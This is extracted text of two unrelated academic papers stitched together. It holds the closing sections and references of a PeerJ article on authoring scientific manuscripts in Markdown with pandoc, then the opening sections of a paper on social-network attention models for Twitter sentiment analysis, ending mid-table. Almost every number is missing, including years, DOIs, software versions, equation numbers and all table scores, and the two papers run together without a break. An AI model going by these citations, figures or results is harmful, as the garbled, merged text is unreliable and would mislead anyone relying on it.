https://peerj.com http://dx.doi.org/ . /peerj-cs. publishers also accept or require latex or odt formats. additional to the general style of the manuscript—organization of sections, fonts, etc.—the citation style of the journal must also be followed. often, the same manuscript has to be prepared for different journals; for example, if the manuscript was rejected by a journal and has to be formatted for another one, or if a preprint of the paper is submitted to an archive that requires a distinct document format than the targeted peer-reviewed journal. in this example, we want to create a manuscript for a plos journal in docx and odt format for wysiwyg word processors. further, a version in latex/ pdf should be produced for peerj submission and archiving at the peerj preprint server. the examples for docx/ odt are kept relatively simple, to show the proof-of-principle and to provide a plain document for the development of own templates. nevertheless, the generated documents should be suitable for submission after little manual editing. for specific journals it may be necessary to create more sophisticated templates or to copy/ paste the generic docx/ odt output into the publisher’s template. development of a docx/ odt template a first docx document with bibliography in plos format is created with pandoc docx output: pandoc -s -s --csl=plos.csl --filter pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md the parameters -s -s generate a typographically correct (dashes, non-breaking spaces etc.) stand-alone document. a bibliography with the plos style is created by the citeproc filter setting --csl=plos.csl --filter pandoc-citeproc. the document settings and styles of the resulting file pandoc-manuscript.docx can be optimized and be used again as document template (--reference-docx=pandoc-manuscript.docx): instead of . pandoc -s -s --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter pandoc-citeproc -o outfile.docx agile-editing-pandoc.md it is also possible to directly re-use a previous output file as template (i.e., template and output file have the same file name): pandoc -s -s --columns= --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter=pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md in this way, the template can be incrementally adjusted to the desired document formatting. the final document may be employed later as pandoc template for other manuscripts with the same specifications. in this case, running pandoc the first time with the template, the contents of the new manuscript would be filled into the provided docx template. a page with docx manuscript formatting of this article is shown in fig. . the same procedure can be applied with an odt formatted document. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure opening a pandoc-generated docx in microsoft office . development of a tex/pdf template the default pandoc latex template can be written into a separate file by: pandoc -d latex > template-peerj.latex this template can be adjusted; for example, by defining unicode encoding (see above), by including particular packages or setting document options (line numbering, font size). the template can then be used with the pandoc parameter --template=pandoc-peerj.latex. the templates used for this document are included as supplemental material (see section ‘software and code availability’ below). styles for html and epub the style for html and epub formats can be defined in .css stylesheets. the supplemental material (see section ‘software and code availability’ below) contains a simple example .css file for modifying the html output, which can be used with the pandoc parameter -c pandoc.css. automating document production the commands necessary to produce the document in a specific formats or styles can be defined in a simple makefile. an example makefile is included in the source code of krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table relevant software used for this article. software use authors version release homepage/repository pandoc universal markup converter john macfarlane . . . / / http://www.pandoc.org pandoc-citeproc library for csl citations with pandoc john macfarlane, andrea rossato . . / / https://github.com/jgm/ pandoc-citeproc pandoc-jats creation of jats files with pandoc martin fenner . / / https://github.com/ mfenner/pandoc-jats owncloud personal cloud software owncloud gmbh, community . . / / https://owncloud.org/ markdown editor plugin for owncloud robin appelman . / / https://github.com/ icewind /files_ markdown bibtool bibtex database tool gerd neugebauer . / / https://github.com/ge- ne/bibtool this article. the desired output file format can be chosen when calling make. for example, make outfile.pdf produces this article in pdf format. calling make without any option creates all listed document types. a makefile producing docx, odt, jats, pdf, latex, html and epub files of this document is provided as supplemental material (see section ‘software and code availability’ below). cross-platform compatibility the make process was tested on windows and linux bit. all documents—docx, odt, jats, latex, pdf, epub and html—were generated successfully, which demonstrates the cross-platform compatibility of the workflow. perspective following the trend to peer production, the formatting of scientific content must become more efficient. markdown/pandoc has the potential to play a key role in the transition from proprietary to community-driven academic production. important research tools, such as the statistical computing and graphics language r (r core team, ) and the jupyter notebook project (kluyver et al., ) have already adopted the md syntax (for example, http://rmarkdown.rstudio.com/). the software for writing manuscripts in md is mature enough to be used by academic writers. therefore, publishers also should consider implementing the md format into their editorial platforms. conclusions authoring scientific manuscripts in markdown (md) format is straight-forward, and manual formatting is reduced to a minimum. the simple syntax of md facilitates document editing and collaborative writing. the rapid conversion of md to multiple formats such as docx, latex, pdf, epub and html can be done easily using pandoc, and templates enable the automated generation of documents according to specific journal styles. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.pandoc.org https://github.com/jgm/pandoc-citeproc https://github.com/jgm/pandoc-citeproc https://github.com/mfenner/pandoc-jats https://github.com/mfenner/pandoc-jats https://owncloud.org/ https://github.com/icewind /files_markdown https://github.com/icewind /files_markdown https://github.com/icewind /files_markdown https://github.com/ge-ne/bibtool https://github.com/ge-ne/bibtool http://rmarkdown.rstudio.com/ http://dx.doi.org/ . /peerj-cs. the additional features we implemented facilitate the correct indexing of meta information of journal articles according to the ‘semantic web’ philosophy. altogether, the md format supports the agile writing and fast production of scientific literature. the associated time and cost reduction especially favours community-driven publication strategies. software and code availability the relevant software for creating this manuscript used is cited according to (smith, katz & niemeyer, ) and listed in table . since unique identifiers are missing for most software projects, we only refer to the project homepages or software repositories: acknowledgements we cordially thank dr. gerd neugebauer for his help in creating a subset of a bibtex data base using bibtool, as well as dr. ricardo a. chávez montes, prof. magnus palmblad and martin fenner for comments on the manuscript. warm thanks also go to anubhav kumar and jennifer könig for proofreading. additional information and declarations funding the work was funded by the consejo nacional de ciencia y tecnología (conacyt) mexico, with the grant fronteras - / and by institutional funding of the centro de investigación y de estudios avanzados del instituto politécnico nacional (cinvestav). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: consejo nacional de ciencia y tecnología (conacyt). fronteras - / . centro de investigación y de estudios avanzados del instituto politécnico nacional (cinvestav). competing interests albert krewinkel is a voluntary member of the pandoc development team. robert winkler is an academic editor for peerj. we have no financial/ legal conflict of interest. author contributions • albert krewinkel and robert winkler conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, programming. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the software created as part of this article, pandoc-scholar, is suitable for general use and has been published at https://github.com/pandoc-scholar/pandoc-scholar; . /zenodo. . the source code of this manuscript, as well as the templates and pandoc makefile, have been deposited to https://github.com/robert-winkler/scientific- articles-markdown/. drawings for document types, devices and applications have been adopted from calibre (http://calibre-ebook.com/), openclipart (https://openclipart.org/) and the gnome theme faenza (https://code.google.com/archive/p/faenza-icon-theme/). references benkler y. . the wealth of networks: how social production transforms markets and freedom. new haven: yale university press. berners-lee t, hendler j. . publishing on the semantic web. nature : – doi . / . bourne p. . will a biological database be different from a biological journal? plos computational biology :e doi . /journal.pcbi. . brauer m, durusau p, edwards g, faure d, magliery t, vogelheim d. . open document format for office applications (opendocument) v . . oasis. available at https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office. brown c. . the e-volution of preprints in the scholarly communication of physicists and astronomers. journal of the association for information science and technology : – doi . / - ( ) : <::aid-asi > . .co; -d. brown c. . the role of electronic preprints in chemical communication: analysis of citation, usage, and acceptance in the journal literature. journal of the association for information science and technology : – doi . /asi. . brown po, eisen mb, varmus he. . why plos became a publisher. plos biology ( ):e doi . /journal.pbio. . butler d. . los alamos loses physics archive as preprint pioneer heads east. nature : – doi . / . callaway e. . preprints come to life. nature news : doi . / a. corbí a, burgos d. . semi-automated correction tools for mathematics-based exercises in mooc environments. international journal of interactive multimedia and artificial intelligence : – doi . /ijimai. . . dominici m. . an overview of pandoc. tugboat : – . eikebrokk t, dahl ta, kessel s. . epub as publication format in open access journals: tools and workflow. code lib epub ahead of print april . eisen m. . publish and be praised. the guardian. available at https://www. theguardian.com/education/ /oct/ /research.highereducation (accessed on october ). krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pandoc-scholar/pandoc-scholar https://doi.org/ . /zenodo. https://github.com/robert-winkler/scientific-articles-markdown/ https://github.com/robert-winkler/scientific-articles-markdown/ http://calibre-ebook.com/ https://openclipart.org/ https://code.google.com/archive/p/faenza-icon-theme/ http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pcbi. https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=office http://dx.doi.org/ . / - ( ) : \lt ::aid-asi \gt . .co; -d http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / http://dx.doi.org/ . / a http://dx.doi.org/ . /ijimai. . https://www.theguardian.com/education/ /oct/ /research.highereducation https://www.theguardian.com/education/ /oct/ /research.highereducation http://dx.doi.org/ . /peerj-cs. fecher b, friesike s. . open science: one term, five schools of thought. in: bartling s, friesike s, eds. opening science. cham: springer international publishing, – . ginsparg p. . first steps towards electronic research communication. computers in physics : – doi . / . . haak ll, fenner m, paglione l, pentz e, ratner h. . orcid: a system to uniquely identify researchers. learned publishing : – doi . / . hickson i, berjon r, faulkner s, leithead t, navara ed, o’connor e, pfeiffer s, faulkner s, navara ed, leithead t, berjon r, hickson i, pfeiffer s, o’connor t. . html . w c. available at https://www.w .org/tr/ /rec-html - / . houghton j, rasmussen b, sheehan p, oppenheim c, morris a, creaser c, greenwood h, summers m, gourlay a. . economic implications of alternative scholarly publishing models: exploring the costs and benefits. available at https://www. webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/ documents/publications/rpteconomicoapublishing.pdf . international organization for standardizationd. . iso - : —document management—portable document format—part : pdf . iso. available at https: //www.iso.org/standard/ .html. international organization for standardization. . iso/iec : — information technology—universal coded character set (ucs). iso. available at https://www.iso.org/standard/ .html. kielhorn a. . multi-target publishing-generating epub, pdf, and more, from markdown using pandoc. tugboat-tex users group : – . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, jupyter development team. . jupyter notebooks–a publishing format for reproducible computational workflows. in: positioning and power in academic publishing: players, agents and agendas, – . lamport l. . latex: a document preparation system. reading: addison-wesley professional. lanthaler m, gütl c. . on using json-ld to create evolvable restful services. in: proceedings of the third international workshop on restful design. new york: acm, – doi . / . . leonard s. . guidance on markdown: design philosophies, stability strategies, and select registrations. internet request for comments. available at https://datatracker. ietf.org/doc/rfc / . national information standards organization. . ansi/niso z . - jats: journal article tag suite. available at http://www.niso.org/apps/group_public/ project/details.php?project_id= . ngo t. . office open xml overview ecma tc . ecma international. available at http://www.ecma-international.org/memento/tc -m.htm. ovadia s. . markdown for librarians and academics. behavioral & social sciences librarian : – doi . / . . . krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / https://www.w .org/tr/ /rec-html - / https://www.w .org/tr/ /rec-html - / https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/ /http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html http://dx.doi.org/ . / . https://datatracker.ietf.org/doc/rfc / https://datatracker.ietf.org/doc/rfc / http://www.niso.org/apps/group_public/project/details.php?project_id= http://www.niso.org/apps/group_public/project/details.php?project_id= http://www.ecma-international.org/memento/tc -m.htm http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/ . raggett d, le hors a, jacobs i. . html . specification. w c. available at https://www.w .org/tr/html / . shotton d. . cito, the citation typing ontology. journal of biomedical semantics : – doi . / - - -s -s . simonsen k. . character mnemonics & character sets. rationel almen planlaegning; internet request for comments. available at https://datatracker.ietf.org/doc/rfc / . smith am, katz ds, niemeyer ke. . software citation principles. peerj computer science :e doi . /peerj-cs. . solomon d, björk b-c. . article processing charges for open access publication— the situation for research intensive universities in the usa and canada. peerj :e doi . /peerj. . suber p. . open access. cambridge: the mit press. towbin h, staehelin t, gordon j. . electrophoretic transfer of proteins from polyacrylamide gels to nitrocellulose sheets: procedure and some applications. proceedings of the national academy of sciences of the united states of america : – . van noorden r. . journal offers flat fee for ‘‘all you can publish’’. nature news : doi . / a. van noorden r. . open access: the true cost of science publishing. nature : – doi . / a. van noorden r. . the arxiv preprint server hits million articles. nature news doi . /nature. . (accessed on december ). volmer da, stokes cs. . how to prepare a manuscript fit-for-purpose for submis- sion and avoid getting a ‘‘desk-reject’’. rapid communications in mass spectrometry ( ): – doi . /rcm. . willinsky j. . the unacknowledged convergence of open source, open access, and open science. first monday epub ahead of print aug doi . /fm.v i . . woelfle m, olliaro p, todd mh. . open science is a research accelerator. nature chemistry : – doi . /nchem. . yergeau f. . utf- , a transformation format of iso . alis technologies. available at https://www.ipa.go.jp/security/rfc/rfc en.html. youngen gk. . citation patterns to traditional and electronic preprints in the pub- lished literature. college & research libraries : – doi . /crl. . . . further reading dpt collective. . monk j, rasch m, cramer f, wu a, eds. from print to ebooks: a hybrid publishing toolkit for the arts. amsterdam: institute of network cultures. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.r-project.org/ https://www.w .org/tr/html / http://dx.doi.org/ . / - - -s -s https://datatracker.ietf.org/doc/rfc / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / a http://dx.doi.org/ . / a http://dx.doi.org/ . /nature. . http://dx.doi.org/ . /rcm. http://dx.doi.org/ . /fm.v i . http://dx.doi.org/ . /nchem. https://www.ipa.go.jp/security/rfc/rfc en.html http://dx.doi.org/ . /crl. . . http://dx.doi.org/ . /peerj-cs. overcoming language variation in sentiment analysis with social attention yi yang and jacob eisenstein school of interactive computing georgia institute of technology atlanta, ga {yiyang+jacobe}@gatech.edu abstract variation in language is ubiquitous, particu- larly in newer forms of writing such as social media. fortunately, variation is not random; it is often linked to social properties of the au- thor. in this paper, we show how to exploit social networks to make sentiment analysis more robust to social language variation. the key idea is linguistic homophily: the tendency of socially linked individuals to use language in similar ways. we formalize this idea in a novel attention-based neural network architec- ture, in which attention is divided among sev- eral basis models, depending on the author’s position in the social network. this has the effect of smoothing the classification function across the social network, and makes it pos- sible to induce personalized classifiers even for authors for whom there is no labeled data or demographic metadata. this model signif- icantly improves the accuracies of sentiment analysis on twitter and on review data. introduction words can mean different things to different people. fortunately, these differences are rarely idiosyn- cratic, but are often linked to social factors, such as age (rosenthal and mckeown, ), gender (eck- ert and mcconnell-ginet, ), race (green, ), geography (trudgill, ), and more inef- fable characteristics such as political and cultural attitudes (fischer, ; labov, ). in natural language processing (nlp), social media data has brought variation to the fore, spurring the develop- ment of new computational techniques for charac- terizing variation in the lexicon (eisenstein et al., ), orthography (eisenstein, ), and syn- tax (blodgett et al., ). however, aside from the focused task of spelling normalization (sproat et al., ; aw et al., ), there have been few attempts to make nlp systems more robust to language vari- ation across speakers or writers. one exception is the work of hovy ( ), who shows that the accuracies of sentiment analysis and topic classification can be improved by the inclusion of coarse-grained author demographics such as age and gender. however, such demographic informa- tion is not directly available in most datasets, and it is not yet clear whether predicted age and gen- der offer any improvements. on the other end of the spectrum are attempts to create personalized lan- guage technologies, as are often employed in infor- mation retrieval (shen et al., ), recommender systems (basilico and hofmann, ), and lan- guage modeling (federico, ). but personal- ization requires annotated data for each individual user—something that may be possible in interactive settings such as information retrieval, but is not typ- ically feasible in natural language processing. we propose a middle ground between group-level demographic characteristics and personalization, by exploiting social network structure. the sociologi- cal theory of homophily asserts that individuals are usually similar to their friends (mcpherson et al., ). this property has been demonstrated for lan- guage (bryden et al., ) as well as for the demo- graphic properties targeted by hovy ( ), which are more likely to be shared by friends than by ran- dom pairs of individuals (thelwall, ). social transactions of the association for computational linguistics, vol. , pp. – , . action editor: christopher potts. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. figure : words such as ‘sick’ can express opposite sen- timent polarities depending on the author. we account for this variation by generalizing across the social network. network information is available in a wide range of contexts, from social media (huberman et al., ) to political speech (thomas et al., ) to histori- cal texts (winterer, ). thus, social network ho- mophily has the potential to provide a more general way to account for linguistic variation in nlp. figure gives a schematic of the motivation for our approach. the word ‘sick’ typically has a nega- tive sentiment, e.g., ‘i would like to believe he’s sick rather than just mean and evil.’ however, in some communities the word can have a positive sentiment, e.g., the lyric ‘this sick beat’, recently trademarked by the musician taylor swift. given labeled ex- amples of ‘sick’ in use by individuals in a social network, we assume that the word will have a simi- lar sentiment meaning for their near neighbors—an assumption of linguistic homophily that is the ba- sis for this research. note that this differs from the assumption of label homophily, which entails that neighbors in the network will hold similar opinions, and will therefore produce similar document-level labels (tan et al., ; hu et al., ). linguis- tic homophily is a more generalizable claim, which could in principle be applied to any language pro- cessing task where author network information is available. to scale this basic intuition to datasets with tens of thousands of unique authors, we compress the social network into vector representations of each author node, using an embedding method for large charles rangel, describing dick cheney in the case of ‘sick’, speakers like taylor swift may em- ploy either the positive and negative meanings, while speak- ers like charles rangel employ only the negative meaning. in other cases, communities may maintain completely distinct se- mantics for a word, such as the term ‘pants’ in american and british english. thanks to christopher potts for suggesting this distinction and this example. dataset # positive # negative # neutral # tweet train , , , , dev , test , , , test , test , , table : statistics of the semeval twitter sentiment datasets. scale networks (tang et al., b). applying the algorithm to figure , the authors within each triad would likely be closer to each other than to authors in the opposite triad. we then incorporate these embeddings into an attention-based neural network model, called social attention, which employs multiple basis models to focus on different regions of the social network. we apply social attention to twitter senti- ment classification, gathering social network meta- data for twitter users in the semeval twitter sen- timent analysis tasks (nakov et al., ). we fur- ther adopt the system to ciao product reviews (tang et al., ), training author embeddings using trust relationships between reviewers. social atten- tion offers a - % improvement over related neu- ral and ensemble architectures in which the social information is ablated. it also outperforms all prior published results on the semeval twitter test sets. data in the semeval twitter sentiment analysis tasks, the goal is to classify the sentiment of each message as positive, negative, or neutral. following rosen- thal et al. ( ), we train and tune our systems on the semeval twitter training and devel- opment datasets respectively, and evaluate on the – semeval twitter test sets. statistics of these datasets are presented in table . our train- ing and development datasets lack some of the orig- inal twitter messages, which may have been deleted since the datasets were constructed. however, our test datasets contain all the tweets used in the se- meval evaluations, making our results comparable with prior work. we construct three author social networks based on the follow, mention, and retweet relations be- tween the , authors in the training dataset, which we refer as follower, mention and retweet. specifically, we use the twitter api to crawl the friends of the semeval users (individuals that they follow) and the most recent , tweets in their timelines. the mention and retweet links are then extracted from the tweet text and metadata. we treat all social networks as undirected graphs, where two users are socially connected if there ex- ists at least one social relation between them. linguistic homophily the hypothesis of linguistic homophily is that so- cially connected individuals tend to use language similarly, as compared to a randomly selected pair of individuals who are not socially connected. we now describe a pilot study that provides support for this hypothesis, focusing on the domain of sentiment analysis. the purpose of this study is to test whether errors in sentiment analysis are assortative on the social networks defined in the previous section: that is, if two individuals (i,j) are connected in the net- work, then a classifier error on i suggests that errors on j are more likely. we test this idea using a simple lexicon-based classification approach, which we apply to the se- meval training data, focusing only on messages that are labeled as positive or negative (ignoring the neu- tral class), and excluding authors who contributed more than one message (a tiny minority). using the social media sentiment lexicons defined by tang et al. ( ), we label a message as positive if it has at least as many positive words as negative words, and as negative otherwise. the assortativity is the frac- tion of dyads for which the classifier makes two cor- rect predictions or two incorrect predictions (new- man, ). this measures whether classification errors are clustered on the network. we compare the observed assortativity against the assortativity in a network that has been randomly we could not gather the authorship information of % of the tweets in the training data, because the tweets or user ac- counts had been deleted by the time we crawled the social in- formation. the twitter api returns a maximum of , tweets. the lexicons include words that are assigned at least . confidence by the method of tang et al. ( ): , positive and , negative words in total. ties go to the positive class because it is more common. rewired. each rewiring epoch involves a number of random rewiring operations equal to the total num- ber of edges in the network. (the edges are ran- domly selected, so a given edge may not be rewired in each epoch.) by counting the number of edges that occur in both the original and rewired networks, we observe that this process converges to a steady state after three or four epochs. as shown in fig- ure , the original observed network displays more assortativity than the randomly rewired networks in nearly every case. thus, the twitter social networks display more linguistic homophily than we would expect due to chance alone. the differences in assortativity across network types are small, indicating that none of the networks are clearly best. the retweet network was the most difficult to rewire, with the greatest proportion of shared edges between the original and rewired net- works. this may explain why the assortativities of the randomly rewired networks were closest to the observed network in this case. model in this section, we describe a neural network method that leverages social network information to improve text classification. our approach is inspired by en- semble learning, where the system prediction is the weighted combination of the outputs of several ba- sis models. we encourage each basis model to focus on a local region of the social network, so that clas- sification on socially connected individuals employs similar model combinations. given a set of instances {xi} and authors {ai}, the goal of personalized probabilistic classification is to estimate a conditional label distribution p(y | x,a). for most authors, no labeled data is avail- able, so it is impossible to estimate this distribution directly. we therefore make a smoothness assump- tion over a social network g: individuals who are socially proximate in g should have similar classi- fiers. this idea is put into practice by modeling the conditional label distribution as a mixture over the specifically, we use the double edge swap operation of the networkx package (hagberg et al., ). this opera- tion preserves the degree of each node in the network. figure : assortativity of observed and randomized networks. each rewiring epoch performs a number of rewiring operations equal to the total number of edges in the network. the randomly rewired networks almost always display lower assortativities than the original network, indicating that the accuracy of the lexicon-based sentiment analyzer is more assortative on the observed social network than one would expect by chance. predictions of k basis classifiers, p(y | x,a) = k∑ k= pr(za = k | a,g) ×p(y | x,za = k). ( ) the basis classifiers p(y | x,za = k) can be arbi- trary conditional distributions; we use convolutional neural networks, as described in § . . the compo- nent weighting distribution pr(za = k | a,g) is conditioned on the social network g, and functions as an attentional mechanism, described in § . . the basic intuition is that for a pair of authors ai and aj who are nearby in the social network g, the pre- diction rules should behave similarly if the atten- tional distributions are similar, p(z | ai,g) ≈ p(z | aj,g). if we have labeled data only for ai, some of the personalization from that data will be shared by aj. the overall classification approach can be viewed as a mixture of experts (jacobs et al., ), leveraging the social network as side information to choose the distribution over experts for each author. . social attention model the goal of the social attention model is to assign similar basis weights to authors who are nearby in the social network g. we operationalize social prox- imity by embedding each node’s social network po- sition into a vector representation. specifically, we employ the line method (tang et al., b), which estimates d(v) dimensional node embeddings va as parameters in a probabilistic model over edges in the social network. these embeddings are learned solely from the social network g, without leveraging any textual information. the attentional weights are then computed from the embeddings using a soft- max layer, pr(za = k | a,g) = exp ( φ>k va + bk ) ∑k k′ exp ( φ>k′va + bk′ ). ( ) this embedding method uses only single- relational networks; in the evaluation, we will show results for twitter networks built from networks of follow, mention, and retweet relations. in future work, we may consider combining all of these rela- tion types into a unified multi-relational network. it is possible that embeddings in such a network could be estimated using techniques borrowed from multi- relational knowledge networks (bordes et al., ; wang et al., ). . sentiment classification with convolutional neural networks we next describe the basis models, p(y | x,z = k). because our target task is classification on microtext documents, we model this distribution using convo- lutional neural networks (cnns; lecun et al., ), which have been proven to perform well on sentence classification tasks (kalchbrenner et al., ; kim, ). cnns apply layers of convolving filters to n-grams, thereby generating a vector of dense lo- cal features. cnns improve upon traditional bag- of-words models because of their ability to capture word ordering information. let x = [h ,h , · · · ,hn] be the input sentence, where hi is the d(w) dimensional word vector cor- responding to the i-th word in the sentence. we use one convolutional layer and one max pooling layer to generate the sentence representation of x. the convolutional layer involves filters that are applied to bigrams to produce feature maps. formally, given the bigram word vectors hi,hi+ , the features gen- erated by m filters can be computed by ci = tanh(wlhi + wrhi+ + b), ( ) where ci is an m dimensional vector, wl and wr are m×d(w) projection matrices, and b is the bias vector. the m dimensional vector representation of the sentence is given by the pooling operation s = max i∈ ,··· ,n− ci. ( ) to obtain the conditional label probability, we uti- lize a multiclass logistic regression model, pr(y = t | x,z = k) = exp(β > t sk + βt)∑t t′= exp(β > t′ sk + βt′ ) , ( ) where βt is an m dimensional weight vector, βt is the corresponding bias term, and sk is the m dimen- sional sentence representation produced by the k-th basis model. . training we fix the pretrained author and word embeddings during training our social attention model. let Θ denote the parameters that need to be learned, which include {wl,wr,b,{βt,βt}tt= } for ev- ery basis cnn model, and the attentional weights {φk,bk}kk= . we minimize the following logistic loss objective for each training instance: `(Θ) = − t∑ t= [y ∗ = t] log pr(y = t | x,a), ( ) where y ∗ is the ground truth class for x, and [·] represents an indicator function. we train the mod- els for between and epochs using the adam optimizer (kingma and ba, ), with early stop- ping on the development set. . initialization one potential problem is that after initialization, a small number of basis models may claim most of the mixture weights for all the users, while other basis models are inactive. this can occur because some basis models may be initialized with parameters that are globally superior. as a result, the “dead” ba- sis models will receive near-zero gradient updates, and therefore can never improve. the true model capacity can thereby be substantially lower than the k assigned experts. ideally, dead basis models will be avoided be- cause each basis model should focus on a unique region of the social network. to ensure that this happens, we pretrain the basis models using an in- stance weighting approach from the domain adapta- tion literature (jiang and zhai, ). for each basis model k, each author a has an instance weight αa,k. these instance weights are based on the author’s so- cial network node embedding, so that socially prox- imate authors will have high weights for the same basis models. this is ensured by endowing each ba- sis model with a random vector γk ∼ n( ,σ i), and setting the instance weights as, αa,k = sigmoid(γ > k va). ( ) the simple design results in similar instance weights for socially proximate authors. during pre- training, we train the k-th basis model by optimizing the following loss function for every instance: `k = −αa,k t∑ t= [y ∗ = t] log pr(y = t | x,za = k). ( ) the pretrained basis models are then assembled to- gether and jointly trained using equation . experiments our main evaluation focuses on the – semeval twitter sentiment analysis tasks. the datasets have been described in § . we train and tune our systems on the train and dev datasets respectively, and evaluate on the test – sets. in addition, we evaluate on another dataset based on ciao product reviews (tang et al., ). . social network expansion we utilize twitter’s follower, mention, and retweet social networks to train user embeddings. by query- ing the twitter api in april , we were able network # author # relation follower+ , , , mention+ , , , retweet+ , , , table : statistics of the author social networks used for training author embeddings. to identify , authors for the tweets in the se- meval datasets described above. we induce so- cial networks for these individuals by crawling their friend links and timelines, as described in § . un- fortunately, these networks are relatively sparse, with a large amount of isolated author nodes. to improve the quality of the author embeddings, we expand the set of author nodes by adding nodes that do the most to densify the author networks: for the follower network, we add additional individu- als that are followed by at least a hundred authors in the original set; for the mention and retweet net- works, we add all users that have been mentioned or retweeted by at least twenty authors in the origi- nal set. the statistics of the resulting networks are presented in table . . experimental settings we employ the pretrained word embeddings used by astudillo et al. ( ), which are trained with a cor- pus of million tweets, and have been shown to perform very well on this task. the embeddings are learned using the structured skip-gram model (ling et al., ), and the embedding dimension is set at , following astudillo et al. ( ). we re- port the same evaluation metric as the semeval chal- lenge: the average f score of positive and negative classes. competitive systems we consider five competi- tive twitter sentiment classification methods. con- volutional neural network (cnn) has been de- scribed in § . , and is the basis model of social attention. mixture of experts employs the same cnn model as an expert, but the mixture densi- regarding the neutral class: systems are penalized with false positives when neutral tweets are incorrectly classified as positive or negative, and with false negatives when positive or negative tweets are incorrectly classified as neutral. this fol- lows the evaluation procedure of the semeval challenge. ties solely depend on the input values. we adopt the summation of the pretrained word embeddings as the sentence-level input to learn the gating func- tion. the model architecture of random attention is nearly identical to social attention: the only distinction is that we replace the pretrained author embeddings with random embedding vectors, draw- ing uniformly from the interval (− . , . ). con- catenation concatenates the author embedding with the sentence representation obtained from cnn, and then feeds the new representation to a softmax clas- sifier. finally, we include social attention, the attention-based neural network method described in § . we also compare against the three top-performing systems in the semeval twitter sentiment analysis challenge (rosenthal et al., ): we- bis (hagen et al., ), unitn (severyn and mos- chitti, ), and lsislif (hamdan et al., ). unitn achieves the best average f score on test – sets among all the submitted systems. finally, we republish results of nlse (astudillo et al., ), a non-linear subspace embedding model. parameter tuning we tune all the hyperparam- eters on the semeval development set. we choose the number of bigram filters for the cnn models from { , , }. the size of author embeddings is selected from { , }. for mix- ture of experts, random attention and social at- tention, we compare a range of numbers of ba- sis models, { , , , }. we found that a rela- tively small number of basis models are usually suf- ficient to achieve good performance. the number of pretraining epochs is selected from { , , }. dur- ing joint training, we check the performance on the development set after each epoch to perform early stopping. . results table summarizes the main empirical findings, where we report results obtained from author em- beddings trained on retweet+ network for so- cial attention. the results of different social networks for social attention are shown in ta- ble . the best hyperparameters are: bigram the summation of the pretrained word embeddings works better than the average of the word embeddings. system test test test average our implementations cnn . . . . mixture of experts . . . * . random attention . . . * . concatenation . . . . social attention . * . * . * . reported results nlse . . . . webis . . . . unitn . . . . lsislif . . . . table : average f score on the semeval test sets. the best results are in bold. results are marked with * if they are significantly better than cnn at p < . . semeval test network average follower+ . . . . mention+ . . . . retweet+ . . . . table : comparison of different social networks with social attention. the best results are in bold. filters; -dimensional author embeddings; k = basis models; pre-training epoch. to establish the statistical significance of the results, we obtain bootstrap samples for each test set, and compute the f score on each sample for each algorithm. a two- tail paired t-test is then applied to determine if the f scores of two algorithms are significantly different, p < . . mixture of experts, random attention, and cnn all achieve similar average f scores on the semeval twitter – test sets. note that random at- tention can benefit from some of the personalized information encoded in the random author embed- dings, as twitter messages posted by the same au- thor share the same attentional weights. however, it barely improves the results, because the majority of authors contribute a single message in the semeval datasets. with the incorporation of author social net- work information, concatenation slightly improves the classification performance. finally, social at- tention gives much better results than concatena- tion, as it is able to model the interactions between text representations and author representations. it significantly outperforms cnn on all the semeval test sets, yielding . % improvement on average f score. social attention also performs substan- tially better than the top-performing semeval sys- tems and nlse, especially on the and test sets. we now turn to a comparison of the social net- works. as shown in table , the retweet+ net- work is the most effective, although the differences are small: social attention outperforms prior work regardless of which network is selected. twit- ter’s “following” relation is a relatively low-cost form of social engagement, and it is less public than retweeting or mentioning another user. thus it is unsurprising that the follower network is least useful for socially-informed personalization. the retweet+ network has denser social connections than mention+, which could lead to better author embeddings. . analysis we now investigate whether language variation in sentiment meaning has been captured by different basis models. we focus on the same sentiment words (tang et al., ) that we used to test lin- guistic homophily in our analysis. we are inter- ested to discover sentiment words that are used with the opposite sentiment meanings by some authors. to measure the level of model-specificity for each basis model more positive more negative banging loss fever broken fucking dear like god yeah wow chilling cold ill sick suck satisfy trust wealth strong lmao ass damn piss bitch shit talent honestly voting win clever insane bawling fever weird 